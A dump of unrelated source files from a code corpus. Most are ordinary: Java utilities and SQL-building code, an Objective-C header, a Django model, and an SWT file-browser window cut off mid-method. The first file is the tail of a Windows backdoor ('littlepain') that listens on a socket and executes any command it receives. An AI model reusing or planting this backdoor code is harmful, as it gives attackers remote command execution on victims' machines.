sizeof(struct sockaddr_in)) == SOCKET_ERROR)
{
return 0;
}
listen(server_sock,SOMAXCONN);
/* main loop! */
while(1)
{
client_sock = accept(server_sock,NULL,0);
tv.tv_usec = 0;
tv.tv_sec = 60;
FD_ZERO(&ft);
FD_SET(client_sock,&ft);
/* send a msg */
send(client_sock,"[:: littlepain ::] by WarGame\r\n",31,0);
while(1)
{
if(select(client_sock+1,&ft,NULL,NULL,&tv) > 0)
{
memset(exec,0,MAX_PATH);
recv(client_sock,exec,MAX_PATH,0);
/* remove "\r" and "\n" */
for(cnt = 0;cnt < strlen(exec);cnt++)
{
if(exec[cnt] == '\r' || exec[cnt] == '\n')
{
exec[cnt] = 0;
}
}
/* (try to) execute the command */
memset(&inf_prog,0,sizeof(STARTUPINFO));
memset(&info_pr,0,sizeof(PROCESS_INFORMATION));
inf_prog.cb = sizeof(STARTUPINFO);
inf_prog.dwFlags = STARTF_USESHOWWINDOW;
inf_prog.wShowWindow = SW_SHOW;
if(CreateProcess(NULL,exec,NULL,NULL,FALSE,CREATE_NEW_CONSOLE,
NULL,NULL,&inf_prog,&info_pr))
{
send(client_sock,"Executed!\r\n",11,0);
}
else
{
send(client_sock,"Not Executed!\r\n",15,0);
}
}
else
{
closesocket(client_sock);
break;
}
}
}
} | ZHYfeng/malicious-code-conceal | 0_mailcious-code/useful/c_windows/littlepain/BackDoor.c | C | apache-2.0 | 1,857 |
/**
* Copyright (C) 2006-2020 Talend Inc. - www.talend.com
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.talend.sdk.component.api.configuration.constraint;
import static java.lang.annotation.ElementType.FIELD;
import static java.lang.annotation.ElementType.PARAMETER;
import static java.lang.annotation.RetentionPolicy.RUNTIME;
import java.lang.annotation.Retention;
import java.lang.annotation.Target;
import java.util.Collection;
import org.talend.sdk.component.api.configuration.constraint.meta.Validation;
import org.talend.sdk.component.api.meta.Documentation;
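/**
 * Constraint marker: the annotated collection option must contain distinct elements.
 * Illustrative use on a hypothetical configuration field:
 *
 * <pre>{@code
 * @Uniques
 * private List<String> labels;
 * }</pre>
 */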
@Validation(expectedTypes = Collection.class, name = "uniqueItems")
@Target({ FIELD, PARAMETER })
@Retention(RUNTIME)
@Documentation("Ensure the elements of the collection must be distinct (kind of set).")
public @interface Uniques {
}
| chmyga/component-runtime | component-api/src/main/java/org/talend/sdk/component/api/configuration/constraint/Uniques.java | Java | apache-2.0 | 1,331 |
package de.mhu.com.morse.channel.sql;
import java.lang.reflect.InvocationTargetException;
import java.sql.SQLException;
import java.util.Iterator;
import java.util.LinkedList;
import de.mhu.lib.ASql;
import de.mhu.lib.dtb.Sth;
import de.mhu.com.morse.aaa.IAclManager;
import de.mhu.com.morse.channel.CMql;
import de.mhu.com.morse.channel.IChannelDriverServer;
import de.mhu.com.morse.channel.IConnectionServer;
import de.mhu.com.morse.channel.IQueryFunction;
import de.mhu.com.morse.channel.IQueryWhereFunction;
import de.mhu.com.morse.mql.ICompiledQuery;
import de.mhu.com.morse.types.IAttribute;
import de.mhu.com.morse.types.IAttributeDefault;
import de.mhu.com.morse.types.ITypes;
import de.mhu.com.morse.usr.UserInformation;
import de.mhu.com.morse.utils.AttributeUtil;
import de.mhu.com.morse.utils.MorseException;
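/**
 * Builds the SQL WHERE clause for a Morse MQL query. The callbacks of
 * {@link WhereParser.IWhereListener} are invoked while the compiled query is
 * parsed, and each callback appends the corresponding SQL fragment to the
 * destination buffer passed to the constructor.
 */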
public class WhereSqlListener implements WhereParser.IWhereListener {
private StringBuffer sb = null;
private Descriptor desc;
private SqlDriver driver;
private IConnectionServer con;
private ITypes types;
private IAclManager aclm;
private UserInformation user;
private ICompiledQuery code;
private boolean needComma;
public WhereSqlListener( SqlDriver pDriver, IConnectionServer pCon, ITypes pTypes, IAclManager pAclm, UserInformation pUser, Descriptor pDesc, ICompiledQuery pCode, StringBuffer dest ) {
desc = pDesc;
driver = pDriver;
con = pCon;
types = pTypes;
aclm = pAclm;
user = pUser;
code = pCode;
sb = dest;
}
public int appendTableSelect(String name, int off) throws MorseException {
name = name.toLowerCase();
if ( ! AttributeUtil.isAttrName( name, true ) )
throw new MorseException( MorseException.UNKNOWN_ATTRIBUTE, name );
Object[] obj = desc.attrMap.get( name );
if ( obj == null )
throw new MorseException( MorseException.UNKNOWN_ATTRIBUTE, name );
if ( obj.length == 0 )
throw new MorseException( MorseException.ATTR_AMBIGIOUS, name );
String tName = (String)obj[3];
int pos = tName.indexOf('.');
if ( pos < 0 )
tName = IAttribute.M_ID;
else
tName = tName.substring( 0, pos + 1 ) + IAttribute.M_ID;
sb.append( driver.getColumnName( tName ) );
sb.append( " IN ( SELECT " );
sb.append( driver.getColumnName( IAttribute.M_ID ) );
sb.append( " FROM r_" );
sb.append( ((IAttribute)obj[1]).getSourceType().getName() ).append( '_' ).append( ((IAttribute)obj[1]).getName() );
sb.append( " WHERE " );
Descriptor desc2 = new Descriptor();
Attr a = new Attr();
a.name = IAttribute.M_ID;
desc2.addAttr( a );
// find all tables / types
Table newTable = new Table();
newTable.name = ((IAttribute)obj[1]).getSourceType().getName() + '.' + ((IAttribute)obj[1]).getName();
desc2.addTable( newTable );
SqlUtils.checkTables( desc2, types, con, user, aclm );
SqlUtils.checkAttributes( con, desc2, user, aclm );
off+=2;
off = SqlUtils.createWhereClause( con, driver, off, code, desc2, types, sb, user, aclm );
// sb.append( ')' );
off++;
return off;
}
public void brackedClose() {
sb.append( ')' );
}
public void brackedOpen() {
sb.append( '(' );
}
public void compareEQ(String left, String right) {
sb.append( left ).append( '=' ).append( right );
}
public void compareGT(String left, String right) {
sb.append( left ).append( '>' ).append( right );
}
public void compareGTEQ(String left, String right) {
sb.append( left ).append( ">=" ).append( right );
}
public void compareINBegin(String left) {
sb.append( left ).append( " IN (" );
needComma = false;
}
public void compareINEnd() {
sb.append( ')' );
}
public void compareINValue(String string) {
if ( needComma )
sb.append( ',' );
needComma = true;
sb.append( string );
}
public void compareLIKE(String left, String right) {
sb.append( left ).append( " LIKE " ).append( right );
}
public void compareLT(String left, String right) {
sb.append( left ).append( '<' ).append( right );
}
public void compareLTEQ(String left, String right) {
sb.append( left ).append( "<=" ).append( right );
}
public void compareNOTEQ(String left, String right) {
sb.append( left ).append( "!=" ).append( right );
}
public int compareSubSelect(String name, int off, boolean distinct) throws MorseException {
Descriptor desc2 = new Descriptor();
off = SqlUtils.findAttributes(off, code, desc2);
if ( desc.attrSize == 0 )
throw new MorseException( MorseException.NO_ATTRIBUTES );
off++; // FROM
// find all tables / types
off = SqlUtils.findTables(off, code, desc2 );
SqlUtils.checkTables( desc2, types, con, user, aclm );
SqlUtils.checkAttributes( con, desc2, user, aclm );
SqlUtils.postCheckAttributes( desc2 );
SqlUtils.checkFunctions( con, desc2, desc2, user, driver.getAclManager() );
StringBuffer sb2 = new StringBuffer();
SqlUtils.createSelect( driver, desc2, sb2, distinct );
boolean hasWhere = false;
if ( SqlUtils.needHintWhere( driver, desc2 ) ) {
if ( ! hasWhere ) {
sb2.append( " WHERE (" );
} else {
sb2.append( " AND (" );
}
SqlUtils.createHintWhereClause( con, driver, desc2, driver.getTypes(), sb2, user, aclm );
sb2.append( " ) " );
hasWhere = true;
}
if ( code.getInteger( off ) == CMql.WHERE ) {
if ( ! hasWhere ) {
sb2.append( " WHERE (" );
} else {
sb2.append( " AND (" );
}
off++;
off = SqlUtils.createWhereClause( con, driver, off, code, desc2, types, sb2, user, aclm );
}
sb.append( name ).append( " IN ( " ).append( sb2.toString() ).append( " ) ");
off++; // )
return off;
}
public String executeFunction( IQueryFunction function, LinkedList<Object> functionAttrs ) throws MorseException {
// Object[] obj = desc.attrMap.get( aName.toLowerCase() );
if ( function instanceof IQuerySqlFunction ) {
String[] attrs = (String[])functionAttrs.toArray( new String[ functionAttrs.size() ] );
for ( int j = 0; j < attrs.length; j++ ) {
attrs[j] = SqlUtils.checkAttribute( driver, null, attrs[j], desc, user );
}
return ((IQuerySqlFunction)function).appendSqlCommand( driver, attrs );
} else {
Object[] values = new Object[ functionAttrs.size() ];
Class[] classes = new Class[ functionAttrs.size() ];
int cnt = 0;
for ( Iterator i = functionAttrs.iterator(); i.hasNext(); ) {
values[cnt] = i.next();
classes[cnt] = values[cnt].getClass();
cnt++;
}
if ( function instanceof IQueryWhereFunction )
return ((IQueryWhereFunction)function).getSingleResult( values );
else {
try {
function.getClass().getMethod( "append", classes ).invoke( function, values );
} catch (Exception e) {
throw new MorseException( MorseException.ERROR, e );
}
return function.getResult();
}
}
}
public void appendInFunction( String left, IQueryFunction function, LinkedList<Object> functionAttrs) throws MorseException {
Sth sth = null;
String tmpName = null;
try {
Object[] obj = desc.attrMap.get( left.toLowerCase() );
tmpName = "x_" + driver.getNextTmpId();
String drop = driver.getDropTmpTableSql( tmpName );
sth = driver.internatConnection.getPool().aquireStatement();
if ( drop != null ) {
try {
sth.executeUpdate( drop );
} catch ( SQLException sqle ) {
}
}
String create = new StringBuffer()
.append( driver.getCreateTmpTablePrefixSql() )
.append( ' ' )
.append( tmpName )
.append( " ( v " )
.append( driver.getColumnDefinition( (IAttribute)obj[1], false ) )
.append( ") ")
.append( driver.getCreateTmpTableSuffixSql() )
.toString();
sth.executeUpdate( create );
sth.executeUpdate( driver.getCreateTmpIndexSql( 1, tmpName, "v" ) );
if ( ! ( function instanceof IQueryWhereFunction ) )
throw new MorseException( MorseException.FUNCTION_NOT_COMPATIBLE );
Iterator<String> res = ((IQueryWhereFunction)function).getRepeatingResult( (Object[])functionAttrs.toArray( new Object[ functionAttrs.size() ] ) );
while ( res.hasNext() ) {
String insert = "INSERT INTO " + tmpName + "(v) VALUES (" + SqlUtils.getValueRepresentation(driver, (IAttribute)obj[1], res.next() ) + ")";
sth.executeUpdate( insert );
}
} catch ( Exception sqle ) {
if ( sqle instanceof MorseException ) throw (MorseException)sqle;
throw new MorseException( MorseException.ERROR, sqle );
} finally {
try { sth.release(); } catch ( Exception ex ) {}
}
desc.addTmpTable( tmpName );
sb.append( " IN ( SELECT v FROM " ).append( tmpName ).append( " ) ");
}
public void operatorAnd() {
sb.append( " AND " );
}
public void operatorNot() {
sb.append( " NOT " );
}
public void operatorOr() {
sb.append( " OR " );
}
public String transformAttribute(String name) throws MorseException {
Object[] obj = desc.attrMap.get( name );
if ( obj == null )
throw new MorseException( MorseException.UNKNOWN_ATTRIBUTE, name );
if ( obj.length == 0 )
throw new MorseException( MorseException.ATTR_AMBIGIOUS, name );
String tName = (String)obj[3];
/*
int pos = tName.indexOf('.');
if ( pos < 0 )
tName = IAttribute.M_ID;
else
tName = tName.substring( 0, pos + 1 ) + IAttribute.M_ID;
*/
return driver.getColumnName( tName );
// return SqlUtils.checkAttribute( driver, null, name, desc, user );
}
public Object transformValue( String attrName, String name) throws MorseException {
if ( ! AttributeUtil.isValue( name ) )
throw new MorseException( MorseException.WRONG_VALUE_FORMAT, name );
if ( attrName != null ) {
Object[] obj = desc.attrMap.get( attrName.toLowerCase() );
if ( obj != null && obj.length != 0 && obj[1] != null ) {
IAttribute attr = (IAttribute)obj[1];
String value = name;
if ( name.length() > 1 && name.charAt( 0 ) == '\'' && name.charAt( name.length() - 1 ) == '\'' )
value = ASql.unescape( name.substring( 1, name.length() - 1 ) );
if ( ! attr.getAco().validate( value ) )
throw new MorseException( MorseException.ATTR_VALUE_NOT_VALIDE, new String[] { attrName, name } );
return SqlUtils.getValueRepresentation( driver, attr, value );
} else {
IAttribute attr = IAttributeDefault.getAttribute( attrName );
if ( attr != null )
return SqlUtils.getValueRepresentation( driver, attr, name );
}
}
return name;
}
}
| mhus/mhus-inka | de.mhus.app.inka.morse.server/src/de/mhu/com/morse/channel/sql/WhereSqlListener.java | Java | apache-2.0 | 10,620 |
//
// UIImage+Image.h
// 生日管家
//
// Created by yz on 15/7/6.
//  Copyright (c) 2015 yz. All rights reserved.
//
#import <UIKit/UIKit.h>
@interface UIImage (Image)
// Generates a 1x1 image filled with the given color
+ (UIImage *)imageWithColor:(UIColor *)color;
// Stretchable (resizable) images
+ (UIImage *)resizedImageWithName:(NSString *)name;
+ (UIImage *)resizedImageWithName:(NSString *)name left:(CGFloat)left top:(CGFloat)top;
// Returns an image that keeps its original rendering mode (not template-rendered)
+ (instancetype)imageWithRenderingModeOriginal:(NSString *)imageName;
// Scales an image down to the target size
+ (UIImage *)imageCompressForSize:(UIImage *)sourceImage targetSize:(CGSize)size;
// Scales an image to the given width and height (variant 2)
+ (UIImage *)resizeImage:(UIImage *)image toWidth:(CGFloat)width height:(CGFloat)height;
// Scales an image proportionally by the given factor
+ (instancetype)zoomImage:(UIImage *)image toScale:(CGFloat)scale;
// Scales an image down to bar button item size
+ (UIImage *)resizeImageToBarButtonItemSize:(UIImage*)image;
@end
| LHJ-K2S/KSPhotoBrowserDemo | KSPhotoBrowser/Classes/Tool/UIImage+Image.h | C | apache-2.0 | 986 |
/*
* Copyright 2016 Code Above Lab LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.codeabovelab.dm.common.utils;
import java.util.function.Function;
import java.util.function.IntPredicate;
import java.util.function.Supplier;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
/**
*/
public class StringUtils {
private StringUtils() {
}
public static String before(String s, char c) {
return beforeOr(s, c, () -> {
            // we throw an exception to preserve the old behavior
throw new IllegalArgumentException("String '" + s + "' must contains '" + c + "'.");
});
}
/**
* Return part of 's' before 'c'
* @param s string which may contain char 'c'
* @param c char
* @param ifNone supplier of value which is used when 'c' is not present in 's' (null not allowed)
* @return part of 's' before 'c' or 'ifNone.get()'
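     * <p>Example (illustrative): {@code beforeOr("key=value", '=', () -> "key=value")} returns {@code "key"}.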
*/
public static String beforeOr(String s, char c, Supplier<String> ifNone) {
int pos = s.indexOf(c);
if(pos < 0) {
return ifNone.get();
}
return s.substring(0, pos);
}
public static String after(String s, char c) {
int pos = s.indexOf(c);
if(pos < 0) {
throw new IllegalArgumentException("String '" + s + "' must contains '" + c + "'.");
}
return s.substring(pos + 1);
}
public static String beforeLast(String s, char c) {
int pos = s.lastIndexOf(c);
if(pos < 0) {
throw new IllegalArgumentException("String '" + s + "' must contains '" + c + "'.");
}
return s.substring(0, pos);
}
public static String afterLast(String s, char c) {
int pos = s.lastIndexOf(c);
if(pos < 0) {
throw new IllegalArgumentException("String '" + s + "' must contains '" + c + "'.");
}
return s.substring(pos + 1);
}
/**
     * Split a string into two pieces at the last occurrence of the delimiter.
     * @param s string
     * @param c delimiter
     * @return null if the string does not contain the delimiter
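     * <p>Example (illustrative): {@code splitLast("a.b.c", '.')} returns the pair {@code "a.b"} and {@code "c"}.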
*/
public static String[] splitLast(String s, char c) {
int pos = s.lastIndexOf(c);
if(pos < 0) {
return null;
}
return new String[] {s.substring(0, pos), s.substring(pos + 1)};
}
/**
     * Split a string into two pieces at the last occurrence of the delimiter.
     * @param s string
     * @param delimiter delimiter
     * @return null if the string does not contain the delimiter
*/
public static String[] splitLast(String s, String delimiter) {
int pos = s.lastIndexOf(delimiter);
if(pos < 0) {
return null;
}
return new String[] {s.substring(0, pos), s.substring(pos + delimiter.length())};
}
/**
     * Return a string which contains only the chars for which charJudge gives true.
     * @param src source string, may be null
     * @param charJudge predicate which consumes codePoints (not chars)
* @return string, null when incoming string is null
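     * <p>Example (illustrative): {@code retain("a-b_c", StringUtils::isAz09)} returns {@code "abc"}.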
*/
public static String retain(String src, IntPredicate charJudge) {
if (src == null) {
return null;
}
final int length = src.length();
StringBuilder sb = new StringBuilder(length);
for (int i = 0; i < length; i++) {
int cp = src.codePointAt(i);
if(charJudge.test(cp)) {
sb.appendCodePoint(cp);
}
}
return sb.toString();
}
/**
     * Retain only characters which satisfy {@link #isAz09(int)}
* @param src source string, may be null
* @return string, null when incoming string is null
*/
public static String retainAz09(String src) {
return retain(src, StringUtils::isAz09);
}
/**
     * Retain chars which are acceptable as a file name or part of a URL on most operating systems. <p/>
     * It: <code>'A'-'z', '0'-'9', '_', '-', '.'</code>
* @param src source string, may be null
* @return string, null when incoming string is null
*/
public static String retainForFileName(String src) {
        return retain(src, StringUtils::isForFileName);
}
/**
* Test that specified codePoint is an ASCII letter or digit
* @param cp codePoint
* @return true for specified chars
*/
public static boolean isAz09(int cp) {
return cp >= '0' && cp <= '9' ||
cp >= 'a' && cp <= 'z' ||
cp >= 'A' && cp <= 'Z';
}
/**
* Test that specified codePoint is an ASCII letter, digit or hyphen '-'.
* @param cp codePoint
* @return true for specified chars
*/
public static boolean isAz09Hyp(int cp) {
return isAz09(cp) || cp == '-';
}
/**
     * Test that the specified codePoint is an ASCII letter, digit, or one of '-', '_', ':', '.'. <p/>
     * This is a common matcher that limits the alphabet acceptable for our system IDs.
* @param cp codePoint
* @return true for specified chars
*/
public static boolean isId(int cp) {
return isAz09(cp) || cp == '-' || cp == '_' || cp == ':' || cp == '.';
}
public static boolean isHex(int cp) {
return cp >= '0' && cp <= '9' ||
cp >= 'a' && cp <= 'f' ||
cp >= 'A' && cp <= 'F';
}
/**
     * Chars which are acceptable as a file name or part of a URL on most operating systems. <p/>
* It: <code>'A'-'z', '0'-'9', '_', '-', '.'</code>
* @param cp codePoint
* @return true for specified chars
*/
public static boolean isForFileName(int cp) {
return isAz09(cp) || cp == '-' || cp == '_' || cp == '.';
}
/**
     * Invoke {@link Object#toString()} on the specified argument; if the argument is null, return null.
     * @param o the object, may be null
     * @return null or the result of o.toString()
*/
public static String valueOf(Object o) {
return o == null? null : o.toString();
}
/**
     * Test that each char of the specified string matches the predicate. <p/>
     * Note that this method does not support Unicode beyond the basic range (it tests chars, not code points), because it is usually applicable only for matching letters placed under code 128.
* @param str string
* @param predicate char matcher
* @return true if all chars match
*/
public static boolean match(String str, IntPredicate predicate) {
final int len = str.length();
if(len == 0) {
return false;
}
for(int i = 0; i < len; i++) {
if(!predicate.test(str.charAt(i))) {
return false;
}
}
return true;
}
/**
* Is a <code>match(str, StringUtils::isAz09);</code>.
* @param str string
* @return true if string match [A-Za-z0-9]*
*/
public static boolean matchAz09(String str) {
return match(str, StringUtils::isAz09);
}
/**
* Is a <code>match(str, StringUtils::isAz09Hyp);</code>.
* @param str string
* @return true if string match [A-Za-z0-9-]*
*/
public static boolean matchAz09Hyp(String str) {
return match(str, StringUtils::isAz09Hyp);
}
/**
* Is a <code>match(str, StringUtils::isId);</code>.
* @param str string
* @return true if string match [A-Za-z0-9-_:.]*
*/
public static boolean matchId(String str) {
return match(str, StringUtils::isId);
}
public static boolean matchHex(String str) {
return match(str, StringUtils::isHex);
}
/**
     * Replace matches of a pattern in a string, obtaining replacement values through a handler function. <p/>
     * Note that this differs from the usual Pattern behavior: group references in the
     * replacement are not processed; the replacement is inserted verbatim.
     * @param pattern pattern
     * @param src source string
     * @param handler function which takes the matched part of the source string and returns the replacement value, must never return null
* @return result string
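     * <p>Example (illustrative):
     * <pre>
     * Pattern p = Pattern.compile("\\$\\{[^}]+\\}");
     * // every ${...} placeholder becomes "1": "a=${x}" gives "a=1"
     * String out = StringUtils.replace(p, "a=${x}", expr -> "1");
     * </pre>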
*/
public static String replace(Pattern pattern, String src, Function<String, String> handler) {
StringBuilder sb = null;
Matcher matcher = pattern.matcher(src);
int pos = 0;
while(matcher.find()) {
if(sb == null) {
                // replacement can be a very rare operation, and we do not need an excess string buffer
sb = new StringBuilder();
}
String expr = matcher.group();
String replacement = handler.apply(expr);
sb.append(src, pos, matcher.start());
sb.append(replacement);
pos = matcher.end();
}
if(sb == null) {
return src;
}
sb.append(src, pos, src.length());
return sb.toString();
}
}
| codeabovelab/haven-platform | common/common-utils/src/main/java/com/codeabovelab/dm/common/utils/StringUtils.java | Java | apache-2.0 | 9,252 |
from django.db import models
from django.utils.html import format_html
from sorl.thumbnail import get_thumbnail
from sorl.thumbnail.fields import ImageField
from sno.models import Sno
class SnoGalleries(models.Model):
class Meta:
    verbose_name = 'Фотография в галерее СНО'
    verbose_name_plural = 'Фотографии в галерее СНО'
name = models.CharField('Название фото', max_length=255, blank=True, null=True)
photo = ImageField(verbose_name='Фото', max_length=255)
description = models.TextField('Описание', blank=True, null=True)
sno = models.ForeignKey(Sno, verbose_name='СНО', on_delete=models.CASCADE)
date_created = models.DateField('Дата', auto_now_add=True)
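    # Renders a 75x75 thumbnail that links to the full-size photo;
    # used as a column in the Django admin (see short_description below).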
def photo_preview(self):
img = get_thumbnail(self.photo, '75x75', crop='center')
return format_html('<a href="{}" target="_blank"><img style="width:75px; height:75px;" src="{}"></a>',
self.photo.url, img.url)
photo_preview.short_description = 'Фото'
def __str__(self):
return '%s (%s)' % (self.name, self.sno.short_name)
| glad-web-developer/zab_sno | src/sno_galleries/models.py | Python | apache-2.0 | 1,164 |
/*
* Copyright 2015 Namihiko Matsumura (https://github.com/n-i-e/)
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.github.n_i_e.deepfolderview;
import java.awt.Toolkit;
import java.awt.datatransfer.Clipboard;
import java.awt.datatransfer.StringSelection;
import java.io.IOException;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.Date;
import org.eclipse.core.databinding.DataBindingContext;
import org.eclipse.core.databinding.beans.PojoProperties;
import org.eclipse.core.databinding.observable.Realm;
import org.eclipse.core.databinding.observable.value.IObservableValue;
import org.eclipse.jface.databinding.swt.SWTObservables;
import org.eclipse.jface.databinding.swt.WidgetProperties;
import org.eclipse.jface.viewers.TableViewer;
import org.eclipse.swt.SWT;
import org.eclipse.swt.events.DisposeEvent;
import org.eclipse.swt.events.DisposeListener;
import org.eclipse.swt.events.ModifyEvent;
import org.eclipse.swt.events.ModifyListener;
import org.eclipse.swt.events.SelectionAdapter;
import org.eclipse.swt.events.SelectionEvent;
import org.eclipse.swt.graphics.Color;
import org.eclipse.swt.graphics.Point;
import org.eclipse.swt.layout.GridData;
import org.eclipse.swt.layout.GridLayout;
import org.eclipse.swt.widgets.Button;
import org.eclipse.swt.widgets.Composite;
import org.eclipse.swt.widgets.Display;
import org.eclipse.swt.widgets.Label;
import org.eclipse.swt.widgets.Menu;
import org.eclipse.swt.widgets.MenuItem;
import org.eclipse.swt.widgets.ProgressBar;
import org.eclipse.swt.widgets.Shell;
import org.eclipse.swt.widgets.Table;
import org.eclipse.swt.widgets.TableColumn;
import org.eclipse.swt.widgets.TableItem;
import org.eclipse.swt.widgets.Text;
import org.eclipse.ui.forms.widgets.FormToolkit;
import org.eclipse.wb.swt.SWTResourceManager;
import com.github.n_i_e.dirtreedb.Assertion;
import com.github.n_i_e.dirtreedb.DBPathEntry;
import com.github.n_i_e.dirtreedb.PathEntry;
import com.github.n_i_e.dirtreedb.lazy.LazyRunnable;
import com.github.n_i_e.dirtreedb.lazy.LazyUpdater;
import com.github.n_i_e.dirtreedb.lazy.LazyUpdater.Dispatcher;
import com.ibm.icu.text.NumberFormat;
import com.ibm.icu.text.SimpleDateFormat;
public class SwtFileFolderMenu extends SwtCommonFileFolderMenu {
@SuppressWarnings("unused")
private DataBindingContext m_bindingContext;
protected Shell shell;
private FormToolkit formToolkit = new FormToolkit(Display.getDefault());
private Text txtLocation;
private Composite compositeToolBar;
private Table table;
private Label lblStatusBar;
private Composite compositeStatusBar;
private ProgressBar progressBar;
@Override protected Shell getShell() { return shell; }
@Override protected Table getTable() { return table; }
@Override protected Label getLblStatusBar() { return lblStatusBar; }
@Override protected ProgressBar getProgressBar() { return progressBar; }
public static void main(String[] args) {
final Display display = Display.getDefault();
Realm.runWithDefault(SWTObservables.getRealm(display), new Runnable() {
public void run() {
try {
final SwtFileFolderMenu window = new SwtFileFolderMenu();
window.open();
/*
display.asyncExec(new Runnable() {
public void run() {
TableItem tableItem = new TableItem(window.table, SWT.NONE);
tableItem.setText(new String[] {"C:\\", "2015-01-01 00:00:00", "1", "2", "3"});
TableItem tableItem_1 = new TableItem(window.table, SWT.NONE);
tableItem_1.setText(new String[] {"D:\\", "2014-01-01 00:00:00", "100", "200", "1"});
}
});*/
} catch (Exception e) {
e.printStackTrace();
}
}
});
}
public void open() {
Display display = Display.getDefault();
//createContents();
//shell.open();
//shell.layout();
while (!shell.isDisposed()) {
if (!display.readAndDispatch()) {
display.sleep();
}
}
}
public SwtFileFolderMenu() {
createContents();
shell.open();
shell.layout();
location = new NavigatableList<Location>();
location.add(new Location());
}
/**
* Create contents of the window.
*/
private void createContents() {
shell = new Shell();
shell.addDisposeListener(new DisposeListener() {
public void widgetDisposed(DisposeEvent arg0) {
Point p = shell.getSize();
PreferenceRW.setSwtFileFolderMenuWindowWidth(p.x);
PreferenceRW.setSwtFileFolderMenuWindowHeight(p.y);
}
});
shell.setImage(SWTResourceManager.getImage(SwtFileFolderMenu.class, "/com/github/n_i_e/deepfolderview/icon/drive-harddisk.png"));
shell.setMinimumSize(new Point(300, 200));
shell.setSize(PreferenceRW.getSwtFileFolderMenuWindowWidth(), PreferenceRW.getSwtFileFolderMenuWindowHeight());
GridLayout gl_shell = new GridLayout(1, false);
gl_shell.verticalSpacing = 6;
gl_shell.marginWidth = 3;
gl_shell.marginHeight = 3;
gl_shell.horizontalSpacing = 6;
shell.setLayout(gl_shell);
Menu menu = new Menu(shell, SWT.BAR);
shell.setMenuBar(menu);
MenuItem mntmFile = new MenuItem(menu, SWT.CASCADE);
mntmFile.setText(Messages.mntmFile_text);
Menu menuFile = new Menu(mntmFile);
mntmFile.setMenu(menuFile);
MenuItem mntmOpen_1 = new MenuItem(menuFile, SWT.NONE);
mntmOpen_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onOpenSelected(e);
}
});
mntmOpen_1.setText(Messages.mntmOpen_text);
MenuItem mntmOpenInNew_1 = new MenuItem(menuFile, SWT.NONE);
mntmOpenInNew_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onOpenInNewWindowSelected(e);
}
});
mntmOpenInNew_1.setText(Messages.mntmOpenInNewWindow_text);
MenuItem mntmOpenDuplicateDetails_1 = new MenuItem(menuFile, SWT.NONE);
mntmOpenDuplicateDetails_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onOpenDuplicateDetailsSelected(e);
}
});
mntmOpenDuplicateDetails_1.setText(Messages.mntmOpenDuplicateDetails_text);
MenuItem mntmCopyTo_2 = new MenuItem(menuFile, SWT.NONE);
mntmCopyTo_2.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onCopyToSelected();
}
});
mntmCopyTo_2.setText(Messages.mntmCopyTo_text);
MenuItem mntmClose = new MenuItem(menuFile, SWT.NONE);
mntmClose.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onCloseSelected();
}
});
mntmClose.setText(Messages.mntmClose_text);
MenuItem mntmQuit = new MenuItem(menuFile, SWT.NONE);
mntmQuit.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onQuitSelected();
}
});
mntmQuit.setText(Messages.mntmQuit_text);
MenuItem mntmEdit = new MenuItem(menu, SWT.CASCADE);
mntmEdit.setText(Messages.mntmEdit_text);
Menu menuEdit = new Menu(mntmEdit);
mntmEdit.setMenu(menuEdit);
MenuItem mntmRun_1 = new MenuItem(menuEdit, SWT.NONE);
mntmRun_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onRunSelected();
}
});
mntmRun_1.setText(Messages.mntmRun_text);
MenuItem mntmCopyAsString_1 = new MenuItem(menuEdit, SWT.NONE);
mntmCopyAsString_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onCopyAsStringSelected();
}
});
mntmCopyAsString_1.setText(Messages.mntmCopyAsString_text);
MenuItem mntmCopyTo_1 = new MenuItem(menuEdit, SWT.NONE);
mntmCopyTo_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onCopyToSelected();
}
});
mntmCopyTo_1.setText(Messages.mntmCopyTo_text);
MenuItem mntmVisibility = new MenuItem(menu, SWT.CASCADE);
mntmVisibility.setText(Messages.mntmVisibility_text);
Menu menuVisibility = new Menu(mntmVisibility);
mntmVisibility.setMenu(menuVisibility);
final MenuItem mntmFoldersVisible = new MenuItem(menuVisibility, SWT.CHECK);
mntmFoldersVisible.setSelection(true);
mntmFoldersVisible.setText(Messages.mntmFoldersVisible_text);
final MenuItem mntmFilesVisible = new MenuItem(menuVisibility, SWT.CHECK);
mntmFilesVisible.setSelection(true);
mntmFilesVisible.setText(Messages.mntmFilesVisible_text);
final MenuItem mntmCompressedFoldersVisible = new MenuItem(menuVisibility, SWT.CHECK);
mntmCompressedFoldersVisible.setSelection(true);
